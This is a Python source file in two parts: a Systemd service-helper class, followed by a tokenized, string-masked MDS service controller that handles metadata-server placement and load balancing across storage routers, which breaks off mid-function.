        status, output = Systemd.get_service_status(name, client, True)
        if status is False:
            return output
        try:
            name = Systemd._get_name(name, client)
            output = client.run('<STR_LIT>'.format(name))
        except CalledProcessError as cpe:
            output = cpe.output
            logger.error('<STR_LIT>'.format(name, output))
        return output

    @staticmethod
    def restart_service(name, client):
        """Restart the unit; returns the command output (failures logged)."""
        try:
            name = Systemd._get_name(name, client)
            output = client.run('<STR_LIT>'.format(name))
        except CalledProcessError as cpe:
            output = cpe.output
            logger.error('<STR_LIT>'.format(name, output))
        return output

    @staticmethod
    def has_service(name, client):
        """Return True when the unit name can be resolved on the node."""
        try:
            Systemd._get_name(name, client)
            return True
        except ValueError:
            return False

    @staticmethod
    def is_enabled(name, client):
        """Return True/False based on (masked) markers in the is-enabled
        style command output; unknown output yields False."""
        name = Systemd._get_name(name, client)
        output = client.run('<STR_LIT>'.format(name))
        if '<STR_LIT>' in output:
            return True
        if '<STR_LIT>' in output:
            return False
        return False

    @staticmethod
    def get_service_pid(name, client):
        """Return the unit's PID parsed from its status output, or 0 when the
        unit is not running or no numeric PID could be parsed.

        Note: the parsed value is returned as a string when numeric
        (`pid.isdigit()` passes), and as int 0 otherwise.
        """
        pid = <NUM_LIT:0>
        name = Systemd._get_name(name, client)
        if Systemd.get_service_status(name, client):
            output = client.run('<STR_LIT>'.format(name))
            if output:
                output = output.splitlines()
                for line in output:
                    if '<STR_LIT>' in line:
                        # Field position 3 of the matching line holds the PID.
                        pid = line.split('<STR_LIT:U+0020>')[<NUM_LIT:3>]
                        if not pid.isdigit():
                            pid = <NUM_LIT:0>
                        break
        return pid
<s> """<STR_LIT>""" <EOL> import math <EOL> import time <EOL> import random <EOL> from celery . schedules import crontab <EOL> from ovs . celery_run import celery <EOL> from ovs . dal . hybrids . diskpartition import DiskPartition <EOL> from ovs . dal . hybrids . j_mdsservice import MDSService <EOL> from ovs . dal . hybrids . j_mdsservicevdisk import MDSServiceVDisk <EOL> from ovs . dal . hybrids . j_storagedriverpartition import StorageDriverPartition <EOL> from ovs . dal . hybrids . service import Service <EOL> from ovs . dal . hybrids . servicetype import ServiceType <EOL> from ovs . dal . hybrids . storagerouter import StorageRouter <EOL> from ovs . dal . lists . servicelist import ServiceList <EOL> from ovs . dal . lists . servicetypelist import ServiceTypeList <EOL> from ovs . dal . lists . vpoollist import VPoolList <EOL> from ovs . extensions . db . etcd . configuration import EtcdConfiguration <EOL> from ovs . extensions . generic . sshclient import SSHClient <EOL> from ovs . extensions . generic . sshclient import UnableToConnectException <EOL> from ovs . extensions . generic . system import System <EOL> from ovs . extensions . storageserver . storagedriver import MetadataServerClient <EOL> from ovs . extensions . storageserver . storagedriver import StorageDriverConfiguration <EOL> from ovs . lib . helpers . decorators import ensure_single <EOL> from ovs . log . logHandler import LogHandler <EOL> from volumedriver . storagerouter import storagerouterclient <EOL> from volumedriver . storagerouter . storagerouterclient import MDSMetaDataBackendConfig <EOL> from volumedriver . storagerouter . storagerouterclient import MDSNodeConfig <EOL> logger = LogHandler . get ( '<STR_LIT>' , name = '<STR_LIT>' ) <EOL> storagerouterclient . Logger . setupLogging ( LogHandler . load_path ( '<STR_LIT>' ) ) <EOL> storagerouterclient . Logger . 
enableLogging ( ) <EOL> class MDSServiceController ( object ) : <EOL> """<STR_LIT>""" <EOL> @ staticmethod <EOL> def prepare_mds_service ( storagerouter , vpool , fresh_only , reload_config ) : <EOL> """<STR_LIT>""" <EOL> service_number = - <NUM_LIT:1> <EOL> for mds_service in vpool . mds_services : <EOL> if mds_service . service . storagerouter_guid == storagerouter . guid : <EOL> service_number = max ( mds_service . number , service_number ) <EOL> if fresh_only is True and service_number >= <NUM_LIT:0> : <EOL> return <EOL> client = SSHClient ( storagerouter ) <EOL> mdsservice_type = ServiceTypeList . get_by_name ( ServiceType . SERVICE_TYPES . MD_SERVER ) <EOL> occupied_ports = [ ] <EOL> for service in mdsservice_type . services : <EOL> if service . storagerouter_guid == storagerouter . guid : <EOL> occupied_ports . extend ( service . ports ) <EOL> mds_port_range = EtcdConfiguration . get ( '<STR_LIT>' . format ( System . get_my_machine_id ( client ) ) ) <EOL> free_ports = System . get_free_ports ( selected_range = mds_port_range , <EOL> exclude = occupied_ports , <EOL> nr = <NUM_LIT:1> , <EOL> client = client ) <EOL> if not free_ports : <EOL> raise RuntimeError ( '<STR_LIT>' . format ( storagerouter . name , mds_port_range ) ) <EOL> db_partition = None <EOL> for disk in storagerouter . disks : <EOL> for partition in disk . partitions : <EOL> if DiskPartition . ROLES . DB in partition . roles : <EOL> db_partition = partition <EOL> break <EOL> if db_partition is None : <EOL> raise RuntimeError ( '<STR_LIT>' . format ( storagerouter . name ) ) <EOL> storagedrivers = [ sd for sd in vpool . storagedrivers if sd . storagerouter_guid == storagerouter . guid ] <EOL> if not storagedrivers : <EOL> raise RuntimeError ( '<STR_LIT>' . format ( vpool . name , storagerouter . name ) ) <EOL> storagedriver = storagedrivers [ <NUM_LIT:0> ] <EOL> service_number += <NUM_LIT:1> <EOL> service = Service ( ) <EOL> service . name = '<STR_LIT>' . format ( vpool . 
name , service_number ) <EOL> service . type = mdsservice_type <EOL> service . ports = [ free_ports [ <NUM_LIT:0> ] ] <EOL> service . storagerouter = storagerouter <EOL> service . save ( ) <EOL> mds_service = MDSService ( ) <EOL> mds_service . vpool = vpool <EOL> mds_service . number = service_number <EOL> mds_service . service = service <EOL> mds_service . save ( ) <EOL> from ovs . lib . storagedriver import StorageDriverController <EOL> sdp = StorageDriverController . add_storagedriverpartition ( storagedriver , { '<STR_LIT:size>' : None , <EOL> '<STR_LIT>' : DiskPartition . ROLES . DB , <EOL> '<STR_LIT>' : StorageDriverPartition . SUBROLE . MDS , <EOL> '<STR_LIT>' : db_partition , <EOL> '<STR_LIT>' : mds_service } ) <EOL> mds_nodes = [ ] <EOL> for service in mdsservice_type . services : <EOL> if service . storagerouter_guid == storagerouter . guid : <EOL> mds_service = service . mds_service <EOL> if mds_service is not None : <EOL> if mds_service . vpool_guid == vpool . guid : <EOL> mds_nodes . append ( { '<STR_LIT:host>' : service . storagerouter . ip , <EOL> '<STR_LIT:port>' : service . ports [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' : sdp . path , <EOL> '<STR_LIT>' : sdp . path } ) <EOL> storagedriver_config = StorageDriverConfiguration ( '<STR_LIT>' , vpool . guid , storagedriver . storagedriver_id ) <EOL> storagedriver_config . load ( ) <EOL> storagedriver_config . clean ( ) <EOL> storagedriver_config . configure_metadata_server ( mds_nodes = mds_nodes ) <EOL> storagedriver_config . save ( client , reload_config = reload_config ) <EOL> return mds_service <EOL> @ staticmethod <EOL> def remove_mds_service ( mds_service , vpool , reconfigure , allow_offline = False ) : <EOL> """<STR_LIT>""" <EOL> if len ( mds_service . vdisks_guids ) > <NUM_LIT:0> and allow_offline is False : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> mdsservice_type = ServiceTypeList . get_by_name ( ServiceType . SERVICE_TYPES . 
MD_SERVER ) <EOL> directories_to_clean = [ ] <EOL> for sd_partition in mds_service . storagedriver_partitions : <EOL> directories_to_clean . append ( sd_partition . path ) <EOL> sd_partition . delete ( ) <EOL> if allow_offline is True : <EOL> for junction in mds_service . vdisks : <EOL> junction . delete ( ) <EOL> mds_service . delete ( ) <EOL> mds_service . service . delete ( ) <EOL> storagerouter = mds_service . service . storagerouter <EOL> try : <EOL> client = SSHClient ( storagerouter ) <EOL> if reconfigure is True : <EOL> mds_nodes = [ ] <EOL> for service in mdsservice_type . services : <EOL> if service . storagerouter_guid == storagerouter . guid : <EOL> mds_service = service . mds_service <EOL> if mds_service . vpool_guid == vpool . guid : <EOL> sdp = [ sd_partition . path for sd_partition in mds_service . storagedriver_partitions if sd_partition . role == DiskPartition . ROLES . DB ] <EOL> mds_nodes . append ( { '<STR_LIT:host>' : service . storagerouter . ip , <EOL> '<STR_LIT:port>' : service . ports [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' : sdp [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' : sdp [ <NUM_LIT:0> ] } ) <EOL> storagedriver = [ sd for sd in storagerouter . storagedrivers if sd . vpool_guid == vpool . guid ] [ <NUM_LIT:0> ] <EOL> storagedriver_config = StorageDriverConfiguration ( '<STR_LIT>' , vpool . guid , storagedriver . storagedriver_id ) <EOL> storagedriver_config . load ( ) <EOL> storagedriver_config . clean ( ) <EOL> storagedriver_config . configure_metadata_server ( mds_nodes = mds_nodes ) <EOL> storagedriver_config . save ( client , reload_config = reconfigure ) <EOL> tries = <NUM_LIT:5> <EOL> while tries > <NUM_LIT:0> : <EOL> try : <EOL> root_client = SSHClient ( storagerouter , username = '<STR_LIT:root>' ) <EOL> root_client . dir_delete ( directories = directories_to_clean , <EOL> follow_symlinks = True ) <EOL> for dir_name in directories_to_clean : <EOL> logger . debug ( '<STR_LIT>' . 
format ( dir_name ) ) <EOL> break <EOL> except Exception : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> tries -= <NUM_LIT:1> <EOL> if tries == <NUM_LIT:0> : <EOL> raise <EOL> except UnableToConnectException : <EOL> if allow_offline is True : <EOL> logger . info ( '<STR_LIT>' ) <EOL> else : <EOL> raise <EOL> @ staticmethod <EOL> def sync_vdisk_to_reality ( vdisk ) : <EOL> """<STR_LIT>""" <EOL> vdisk . reload_client ( ) <EOL> vdisk . invalidate_dynamics ( [ '<STR_LIT:info>' ] ) <EOL> config = vdisk . info [ '<STR_LIT>' ] <EOL> config_dict = { } <EOL> for item in config : <EOL> if item [ '<STR_LIT>' ] not in config_dict : <EOL> config_dict [ item [ '<STR_LIT>' ] ] = [ ] <EOL> config_dict [ item [ '<STR_LIT>' ] ] . append ( item [ '<STR_LIT:port>' ] ) <EOL> mds_dict = { } <EOL> for junction in vdisk . mds_services : <EOL> service = junction . mds_service . service <EOL> storagerouter = service . storagerouter <EOL> if config [ <NUM_LIT:0> ] [ '<STR_LIT>' ] == storagerouter . ip and config [ <NUM_LIT:0> ] [ '<STR_LIT:port>' ] == service . ports [ <NUM_LIT:0> ] : <EOL> junction . is_master = True <EOL> junction . save ( ) <EOL> if storagerouter . ip not in mds_dict : <EOL> mds_dict [ storagerouter . ip ] = [ ] <EOL> mds_dict [ storagerouter . ip ] . append ( service . ports [ <NUM_LIT:0> ] ) <EOL> elif storagerouter . ip in config_dict and service . ports [ <NUM_LIT:0> ] in config_dict [ storagerouter . ip ] : <EOL> junction . is_master = False <EOL> junction . save ( ) <EOL> if storagerouter . ip not in mds_dict : <EOL> mds_dict [ storagerouter . ip ] = [ ] <EOL> mds_dict [ storagerouter . ip ] . append ( service . ports [ <NUM_LIT:0> ] ) <EOL> else : <EOL> junction . delete ( ) <EOL> for ip , ports in config_dict . iteritems ( ) : <EOL> for port in ports : <EOL> if ip not in mds_dict or port not in mds_dict [ ip ] : <EOL> service = ServiceList . 
get_by_ip_ports ( ip , [ port ] ) <EOL> if service is not None : <EOL> mds_service_vdisk = MDSServiceVDisk ( ) <EOL> mds_service_vdisk . vdisk = vdisk <EOL> mds_service_vdisk . mds_service = service . mds_service <EOL> mds_service_vdisk . is_master = config [ <NUM_LIT:0> ] [ '<STR_LIT>' ] == service . storagerouter . ip and config [ <NUM_LIT:0> ] [ '<STR_LIT:port>' ] == service . ports [ <NUM_LIT:0> ] <EOL> mds_service_vdisk . save ( ) <EOL> @ staticmethod <EOL> def ensure_safety ( vdisk , excluded_storagerouters = None ) : <EOL> """<STR_LIT>""" <EOL> def _add_suitable_nodes ( local_failure_domain , local_safety ) : <EOL> if len ( nodes ) < local_safety : <EOL> for local_load in sorted ( failure_domain_load_dict [ local_failure_domain ] ) : <EOL> for local_service in failure_domain_load_dict [ local_failure_domain ] [ local_load ] : <EOL> if len ( nodes ) < local_safety and local_service . storagerouter . ip not in nodes : <EOL> try : <EOL> SSHClient ( local_service . storagerouter ) <EOL> new_services . append ( local_service ) <EOL> nodes . add ( local_service . storagerouter . ip ) <EOL> except UnableToConnectException : <EOL> logger . debug ( '<STR_LIT>' . format ( vdisk . guid , service . storagerouter . ip ) ) <EOL> return nodes , new_services <EOL> logger . debug ( '<STR_LIT>' . format ( vdisk . guid , vdisk . name ) ) <EOL> vdisk . reload_client ( ) <EOL> vdisk . invalidate_dynamics ( [ '<STR_LIT:info>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> if vdisk . storagerouter_guid is None : <EOL> raise ValueError ( '<STR_LIT>' . format ( vdisk . name , vdisk . guid ) ) <EOL> if excluded_storagerouters is None : <EOL> excluded_storagerouters = [ ] <EOL> services = sorted ( [ mds_service . service for mds_service in vdisk . vpool . mds_services <EOL> if mds_service . service . storagerouter not in excluded_storagerouters ] , key = lambda k : k . ports ) <EOL> nodes = set ( service . storagerouter . 
ip for service in services ) <EOL> vdisk_storagerouter = StorageRouter ( vdisk . storagerouter_guid ) <EOL> primary_failure_domain = vdisk_storagerouter . primary_failure_domain <EOL> if vdisk . secondary_failure_domain is not None : <EOL> secondary_failure_domain = vdisk . secondary_failure_domain <EOL> else : <EOL> secondary_failure_domain = vdisk_storagerouter . secondary_failure_domain <EOL> failure_domain_load_dict = { primary_failure_domain : { } } <EOL> failure_domain_used_services_dict = { primary_failure_domain : [ ] } <EOL> failure_domain_available_services_dict = { primary_failure_domain : [ ] } <EOL> storage_router_failure_domain_dict = dict ( ( storage_router , primary_failure_domain ) for storage_router in primary_failure_domain . primary_storagerouters ) <EOL> if secondary_failure_domain is not None : <EOL> failure_domain_load_dict [ secondary_failure_domain ] = { } <EOL> failure_domain_used_services_dict [ secondary_failure_domain ] = [ ] <EOL> failure_domain_available_services_dict [ secondary_failure_domain ] = [ ] <EOL> storage_router_failure_domain_dict . update ( dict ( ( storage_router , secondary_failure_domain ) for storage_router in secondary_failure_domain . primary_storagerouters ) ) <EOL> services_load = { } <EOL> service_per_key = { } <EOL> for service in services : <EOL> services_load [ service ] = MDSServiceController . get_mds_load ( service . mds_service ) <EOL> service_per_key [ '<STR_LIT>' . format ( service . storagerouter . ip , service . ports [ <NUM_LIT:0> ] ) ] = service <EOL> configs = vdisk . info [ '<STR_LIT>' ] <EOL> for config in configs : <EOL> config [ '<STR_LIT:key>' ] = '<STR_LIT>' . format ( config [ '<STR_LIT>' ] , config [ '<STR_LIT:port>' ] ) <EOL> master_service = None <EOL> reconfigure_reasons = [ ] <EOL> if len ( configs ) > <NUM_LIT:0> : <EOL> config = configs . pop ( <NUM_LIT:0> ) <EOL> if config [ '<STR_LIT:key>' ] in service_per_key : <EOL> master_service = service_per_key . 
get ( config [ '<STR_LIT:key>' ] ) <EOL> else : <EOL> reconfigure_reasons . append ( '<STR_LIT>' . format ( config [ '<STR_LIT>' ] , config [ '<STR_LIT:port>' ] ) ) <EOL> slave_services = [ ] <EOL> for config in configs : <EOL> if config [ '<STR_LIT:key>' ] in service_per_key : <EOL> slave_services . append ( service_per_key [ config [ '<STR_LIT:key>' ] ] ) <EOL> else : <EOL> reconfigure_reasons . append ( '<STR_LIT>' . format ( config [ '<STR_LIT>' ] , config [ '<STR_LIT:port>' ] ) ) <EOL> tlogs = EtcdConfiguration . get ( '<STR_LIT>' ) <EOL> safety = EtcdConfiguration . get ( '<STR_LIT>' ) <EOL> max_load = EtcdConfiguration . get ( '<STR_LIT>' ) <EOL> for service in services : <EOL> if service == master_service or service in slave_services : <EOL> load = services_load [ service ] [ <NUM_LIT:0> ] <EOL> if service . storagerouter in storage_router_failure_domain_dict : <EOL> failure_domain_used_services_dict [ storage_router_failure_domain_dict [ service . storagerouter ] ] . append ( service ) <EOL> else : <EOL> reconfigure_reasons . append ( '<STR_LIT>' . format ( service . name , service . storagerouter . ip ) ) <EOL> else : <EOL> load = services_load [ service ] [ <NUM_LIT:1> ] <EOL> services_load [ service ] = load <EOL> if service . storagerouter in storage_router_failure_domain_dict : <EOL> failure_domain = storage_router_failure_domain_dict [ service . storagerouter ] <EOL> failure_domain_available_services_dict [ failure_domain ] . append ( service ) <EOL> if load <= max_load : <EOL> if load not in failure_domain_load_dict [ failure_domain ] : <EOL> failure_domain_load_dict [ failure_domain ] [ load ] = [ ] <EOL> failure_domain_load_dict [ failure_domain ] [ load ] . append ( service ) <EOL> service_nodes = [ ] <EOL> if master_service is not None : <EOL> service_nodes . append ( master_service . storagerouter . ip ) <EOL> for service in slave_services : <EOL> ip = service . storagerouter . ip <EOL> if ip in service_nodes : <EOL> reconfigure_reasons . 
append ( '<STR_LIT>' ) <EOL> else : <EOL> service_nodes . append ( ip ) <EOL> if len ( service_nodes ) > safety : <EOL> reconfigure_reasons . append ( '<STR_LIT>' ) <EOL> if len ( service_nodes ) < safety and len ( service_nodes ) < len ( nodes ) : <EOL> reconfigure_reasons . append ( '<STR_LIT>' ) <EOL> if master_service is not None and services_load [ master_service ] > max_load : <EOL> reconfigure_reasons . append ( '<STR_LIT>' ) <EOL> if master_service is not None and master_service . storagerouter_guid != vdisk . storagerouter_guid : <EOL> reconfigure_reasons . append ( '<STR_LIT>' ) <EOL> if any ( service for service in slave_services if services_load [ service ] > max_load ) : <EOL> reconfigure_reasons . append ( '<STR_LIT>' ) <EOL> recommended_primary = math . ceil ( safety / <NUM_LIT> ) if secondary_failure_domain is not None else safety <EOL> recommended_secondary = safety - recommended_primary <EOL> if master_service is not None and master_service not in failure_domain_used_services_dict [ primary_failure_domain ] : <EOL> reconfigure_reasons . append ( '<STR_LIT>' ) <EOL> primary_services_used = len ( failure_domain_used_services_dict [ primary_failure_domain ] ) <EOL> primary_services_available = len ( failure_domain_available_services_dict [ primary_failure_domain ] ) <EOL> if primary_services_used < recommended_primary and primary_services_used < primary_services_available : <EOL> reconfigure_reasons . append ( '<STR_LIT>' ) <EOL> if secondary_failure_domain is not None : <EOL> secondary_services_used = len ( failure_domain_used_services_dict [ secondary_failure_domain ] ) <EOL> secondary_services_available = len ( failure_domain_available_services_dict [ secondary_failure_domain ] ) <EOL> if secondary_services_used < recommended_secondary and secondary_services_used < secondary_services_available : <EOL> reconfigure_reasons . 
append ( '<STR_LIT>' ) <EOL> secondary = False <EOL> for slave_service in slave_services : <EOL> if secondary is True and slave_service in failure_domain_used_services_dict [ primary_failure_domain ] : <EOL> reconfigure_reasons . append ( '<STR_LIT>' ) <EOL> break <EOL> if slave_service in failure_domain_used_services_dict [ secondary_failure_domain ] : <EOL> secondary = True <EOL> if not reconfigure_reasons : <EOL> logger . debug ( '<STR_LIT>' . format ( vdisk . guid ) ) <EOL> MDSServiceController . sync_vdisk_to_reality ( vdisk ) <EOL> return <EOL> logger . debug ( '<STR_LIT>' . format ( vdisk . guid ) ) <EOL> for reason in reconfigure_reasons : <EOL> logger . debug ( '<STR_LIT>' . format ( vdisk . guid , reason ) ) <EOL> new_services = [ ] <EOL> master_ok = master_service is not None <EOL> if master_ok is True : <EOL> master_ok = master_service . storagerouter_guid == vdisk . storagerouter_guid and services_load [ master_service ] <= max_load <EOL> if master_ok : <EOL> new_services . append ( master_service ) <EOL> else : <EOL> candidate_master_service = None <EOL> candidate_master_load = <NUM_LIT:0> <EOL> local_mds = None <EOL> local_mds_load = <NUM_LIT:0> <EOL> for service in failure_domain_available_services_dict [ primary_failure_domain ] : <EOL> load = services_load [ service ] <EOL> if load <= max_load and service . storagerouter_guid == vdisk . storagerouter_guid : <EOL> if local_mds is None or local_mds_load > load : <EOL> local_mds = service <EOL> local_mds_load = load <EOL> if service in slave_services : <EOL> if candidate_master_service is None or candidate_master_load > load : <EOL> candidate_master_service = service <EOL> candidate_master_load = load <EOL> if candidate_master_service is not None : <EOL> client = MetadataServerClient . load ( candidate_master_service ) <EOL> try : <EOL> amount_of_tlogs = client . catch_up ( str ( vdisk . volume_id ) , True ) <EOL> except RuntimeError as ex : <EOL> if '<STR_LIT>' in ex . message : <EOL> client . 
create_namespace ( str ( vdisk . volume_id ) ) <EOL> amount_of_tlogs = client . catch_up ( str ( vdisk . volume_id ) , True ) <EOL> else : <EOL> raise <EOL> if amount_of_tlogs < tlogs : <EOL> start = time . time ( ) <EOL> client . catch_up ( str ( vdisk . volume_id ) , False ) <EOL> logger . debug ( '<STR_LIT>' . format ( vdisk . guid , round ( time . time ( ) - start , <NUM_LIT:2> ) ) ) <EOL> new_services . append ( candidate_master_service ) <EOL> if master_service is not None : <EOL> slave_services . append ( master_service ) <EOL> else : <EOL> if master_service is not None : <EOL> new_services . append ( master_service ) <EOL> new_services . append ( candidate_master_service ) <EOL> if candidate_master_service in slave_services : <EOL> slave_services . remove ( candidate_master_service ) <EOL> else : <EOL> if master_service is not None : <EOL> new_services . append ( master_service ) <EOL> if local_mds is not None : <EOL> new_services . append ( local_mds ) <EOL> if local_mds in slave_services : <EOL> slave_services . remove ( local_mds ) <EOL> nodes = set ( service . storagerouter . ip for service in new_services ) <EOL> secondary_node_count = <NUM_LIT:0> <EOL> service_to_recycle = None <EOL> if len ( nodes ) < safety : <EOL> if recommended_primary > <NUM_LIT:1> : <EOL> for load in sorted ( failure_domain_load_dict [ primary_failure_domain ] ) : <EOL> for service in failure_domain_load_dict [ primary_failure_domain ] [ load ] : <EOL> if service_to_recycle is None and service in slave_services and service . storagerouter . ip not in nodes : <EOL> try : <EOL> SSHClient ( service . storagerouter ) <EOL> service_to_recycle = service <EOL> except UnableToConnectException : <EOL> logger . debug ( '<STR_LIT>' . format ( vdisk . guid , service . storagerouter . 
ip ) ) <EOL> if service_to_recycle is None and secondary_failure_domain is not None : <EOL> for load in sorted ( failure_domain_load_dict [ secondary_failure_domain ] ) : <EOL> for service in failure_domain_load_dict [ secondary_failure_domain ] [ load ] : <EOL> if service_to_recycle is None and service in slave_services and service . storagerouter . ip not in nodes : <EOL> try : <EOL> SSHClient ( service . storagerouter ) <EOL> service_to_recycle = service <EOL> secondary_node_count = <NUM_LIT:1> <EOL> except UnableToConnectException : <EOL> logger . debug ( '<STR_LIT>' . format ( vdisk . guid , service . storagerouter . ip ) ) <EOL> if service_to_recycle is not None : <EOL> slave_services . remove ( service_to_recycle ) <EOL> if secondary_node_count == <NUM_LIT:0> : <EOL> new_services . append ( service_to_recycle ) <EOL> nodes . add ( service_to_recycle . storagerouter . ip ) <EOL> nodes , new_services = _add_suitable_nodes ( local_failure_domain = primary_failure_domain , <EOL> local_safety = recommended_primary ) <EOL> if secondary_node_count == <NUM_LIT:1> : <EOL> new_services . append ( service_to_recycle ) <EOL> nodes . add ( service_to_recycle . storagerouter . ip ) <EOL> if secondary_failure_domain is not None : <EOL> nodes , new_services = _add_suitable_nodes ( local_failure_domain = secondary_failure_domain , <EOL> local_safety = safety ) <EOL> if len ( nodes ) < safety : <EOL> nodes , new_services = _add_suitable_nodes ( local_failure_domain = primary_failure_domain , <EOL> local_safety = safety ) <EOL> configs = [ ] <EOL> for service in new_services : <EOL> client = MetadataServerClient . load ( service ) <EOL> client . create_namespace ( str ( vdisk . volume_id ) ) <EOL> configs . append ( MDSNodeConfig ( address = str ( service . storagerouter . ip ) , <EOL> port = service . ports [ <NUM_LIT:0> ] ) ) <EOL> vdisk . storagedriver_client . update_metadata_backend_config ( volume_id = str ( vdisk . 
volume_id ) , <EOL> metadata_backend_config = MDSMetaDataBackendConfig ( configs ) ) <EOL> MDSServiceController . sync_vdisk_to_reality ( vdisk ) <EOL> logger . debug ( '<STR_LIT>' . format ( vdisk . guid ) ) <EOL> @ staticmethod <EOL> def get_preferred_mds ( storagerouter , vpool ) : <EOL> """<STR_LIT>""" <EOL> mds_service = ( None , float ( '<STR_LIT>' ) ) <EOL> for current_mds_service in vpool . mds_services : <EOL> if current_mds_service . service . storagerouter_guid == storagerouter . guid : <EOL> load = MDSServiceController . get_mds_load ( current_mds_service ) [ <NUM_LIT:0> ] <EOL> if mds_service is None or load < mds_service [ <NUM_LIT:1> ] : <EOL> mds_service = ( current_mds_service , load ) <EOL> return mds_service <EOL> @ staticmethod <EOL> def get_mds_load ( mds_service ) : <EOL> """<STR_LIT>""" <EOL> service_capacity = float ( mds_service . capacity ) <EOL> if service_capacity < <NUM_LIT:0> : <EOL> return <NUM_LIT:50> , <NUM_LIT:50> <EOL> if service_capacity == <NUM_LIT:0> : <EOL> return float ( '<STR_LIT>' ) , float ( '<STR_LIT>' ) <EOL> usage = len ( mds_service . vdisks_guids ) <EOL> return round ( usage / service_capacity * <NUM_LIT> , <NUM_LIT:5> ) , round ( ( usage + <NUM_LIT:1> ) / service_capacity * <NUM_LIT> , <NUM_LIT:5> ) <EOL> @ staticmethod <EOL> def get_mds_storagedriver_config_set ( vpool , check_online = False ) : <EOL> """<STR_LIT>""" <EOL> mds_per_storagerouter = { } <EOL> mds_per_load = { } <EOL> for storagedriver in vpool . storagedrivers : <EOL> storagerouter = storagedriver . storagerouter <EOL> if check_online is True : <EOL> try : <EOL> client = SSHClient ( storagerouter ) <EOL> client . run ( '<STR_LIT>' ) <EOL> except UnableToConnectException : <EOL> continue <EOL> mds_service , load = MDSServiceController . get_preferred_mds ( storagerouter , vpool ) <EOL> if mds_service is None : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> mds_per_storagerouter [ storagerouter ] = { '<STR_LIT:host>' : storagerouter . 
ip , '<STR_LIT:port>' : mds_service . service . ports [ <NUM_LIT:0> ] } <EOL> if load not in mds_per_load : <EOL> mds_per_load [ load ] = [ ] <EOL> mds_per_load [ load ] . append ( storagerouter ) <EOL> safety = EtcdConfiguration . get ( '<STR_LIT>' ) <EOL> config_set = { } <EOL> for storagerouter , ip_info in mds_per_storagerouter . iteritems ( ) : <EOL> primary_failure_domain = storagerouter . primary_failure_domain <EOL> secondary_failure_domain = storagerouter . secondary_failure_domain <EOL> config_set [ storagerouter . guid ] = [ ip_info ] <EOL> for load in sorted ( mds_per_load ) : <EOL> if len ( config_set [ storagerouter . guid ] ) >= safety : <EOL> break <EOL> other_storagerouters = mds_per_load [ load ] <EOL> random . shuffle ( other_storagerouters ) <EOL> for other_storagerouter in other_storagerouters : <EOL> if len ( config_set [ storagerouter . guid ] ) >= safety : <EOL> break <EOL> if other_storagerouter != storagerouter and other_storagerouter in primary_failure_domain . primary_storagerouters : <EOL> config_set [ storagerouter . guid ] . append ( mds_per_storagerouter [ other_storagerouter ] ) <EOL> if secondary_failure_domain is not None : <EOL> for load in sorted ( mds_per_load ) : <EOL> if len ( config_set [ storagerouter . guid ] ) >= safety : <EOL> break <EOL> other_storagerouters = mds_per_load [ load ] <EOL> random . shuffle ( other_storagerouters ) <EOL> for other_storagerouter in other_storagerouters : <EOL> if len ( config_set [ storagerouter . guid ] ) >= safety : <EOL> break <EOL> if other_storagerouter != storagerouter and other_storagerouter in secondary_failure_domain . primary_storagerouters : <EOL> config_set [ storagerouter . guid ] . append ( mds_per_storagerouter [ other_storagerouter ] ) <EOL> return config_set <EOL> @ staticmethod <EOL> @ celery . 
task ( name = '<STR_LIT>' , schedule = crontab ( minute = '<STR_LIT>' , hour = '<STR_LIT>' ) ) <EOL> @ ensure_single ( task_name = '<STR_LIT>' , mode = '<STR_LIT>' ) <EOL> def mds_checkup ( ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( '<STR_LIT>' ) <EOL> mds_dict = { } <EOL> for vpool in VPoolList . get_vpools ( ) : <EOL> logger . info ( '<STR_LIT>' . format ( vpool . name ) ) <EOL> mds_dict [ vpool ] = { } <EOL> for mds_service in vpool . mds_services : <EOL> storagerouter = mds_service . service . storagerouter <EOL> if storagerouter not in mds_dict [ vpool ] : <EOL> mds_dict [ vpool ] [ storagerouter ] = { '<STR_LIT>' : None , <EOL> '<STR_LIT>' : [ ] } <EOL> try : <EOL> client = SSHClient ( storagerouter , username = '<STR_LIT:root>' ) <EOL> client . run ( '<STR_LIT>' ) <EOL> mds_dict [ vpool ] [ storagerouter ] [ '<STR_LIT>' ] = client <EOL> logger . info ( '<STR_LIT>' . format ( vpool . name , storagerouter . name ) ) <EOL> except UnableToConnectException : <EOL> logger . info ( '<STR_LIT>' . format ( vpool . name , storagerouter . name ) ) <EOL> mds_dict [ vpool ] [ storagerouter ] [ '<STR_LIT>' ] . append ( mds_service ) <EOL> failures = [ ] <EOL> max_load = EtcdConfiguration . get ( '<STR_LIT>' ) <EOL> for vpool , storagerouter_info in mds_dict . iteritems ( ) : <EOL> for storagerouter in storagerouter_info : <EOL> client = mds_dict [ vpool ] [ storagerouter ] [ '<STR_LIT>' ] <EOL> mds_services = mds_dict [ vpool ] [ storagerouter ] [ '<STR_LIT>' ] <EOL> has_room = False <EOL> for mds_service in mds_services [ : ] : <EOL> if mds_service . capacity == <NUM_LIT:0> and len ( mds_service . vdisks_guids ) == <NUM_LIT:0> : <EOL> logger . info ( '<STR_LIT>' . format ( mds_service . number , vpool . name ) ) <EOL> MDSServiceController . remove_mds_service ( mds_service , vpool , reconfigure = True , allow_offline = client is None ) <EOL> mds_services . remove ( mds_service ) <EOL> for mds_service in mds_services : <EOL> _ , load = MDSServiceController . 
